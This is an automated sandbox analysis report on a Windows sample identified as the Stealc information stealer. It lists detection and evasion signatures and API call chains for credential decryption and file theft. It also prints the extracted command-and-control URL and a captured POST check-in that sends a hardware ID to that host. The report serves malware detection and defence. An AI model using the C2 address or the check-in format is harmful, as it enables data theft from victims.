Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1562275
MD5:754418530dca8e93cba3a5a7f409f441
SHA1:b847b0861f4e1d1d309c0bdf51f02fb8954663f7
SHA256:0d025b505282376cd436001c8148e720475463ac9c266bf3788689f93147a178
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 754418530DCA8E93CBA3A5A7F409F441)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2177796637.0000000005080000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1488JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1488JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-25T12:58:18.417120+010020442431Malware Command and Control Activity Detected192.168.2.649722185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.phptopAvira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.1488.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E34C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00E34C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E360D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00E360D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E540B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00E540B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E46960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00E46960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_00E3EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00E39B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E46B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00E46B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00E39B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00E37750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E418A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E418A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E43910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E43910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E41269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E41250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E41250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E4E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E4CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E423A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E423A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E3DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E42390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00E42390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E3DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E44B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E44B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E44B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00E4D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_00E4DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E316A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_00E316A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E316B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00E316B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49722 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 30 46 39 31 46 35 43 46 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="hwid"620F91F5CF363848468766------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="build"mars------GIIEGHIDBGHIECAAECGD--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E36C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,0_2_00E36C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIEGHIDBGHIECAAECGDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 30 46 39 31 46 35 43 46 33 36 33 38 34 38 34 36 38 37 36 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 45 47 48 49 44 42 47 48 49 45 43 41 41 45 43 47 44 2d 2d 0d 0a Data Ascii: ------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="hwid"620F91F5CF363848468766------GIIEGHIDBGHIECAAECGDContent-Disposition: form-data; name="build"mars------GIIEGHIDBGHIECAAECGD--
              Source: file.exe, 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264756747.0000000000D55000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264756747.0000000000D0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2264756747.0000000000D83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpH
              Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phptop
              Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
              Source: file.exe, 00000000.00000002.2264756747.0000000000D67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00E39770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EE11E0_2_011EE11E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E548B00_2_00E548B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EA9870_2_011EA987
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E909D0_2_011E909D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0116C09C0_2_0116C09C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D88A20_2_011D88A2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F48ED0_2_011F48ED
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011E73950_2_011E7395
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01143A5F0_2_01143A5F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EFA530_2_011EFA53
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011EC5250_2_011EC525
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0119DD9D0_2_0119DD9D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011F2DDD0_2_011F2DDD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B1CCF0_2_010B1CCF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012697580_2_01269758
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010E47E50_2_010E47E5
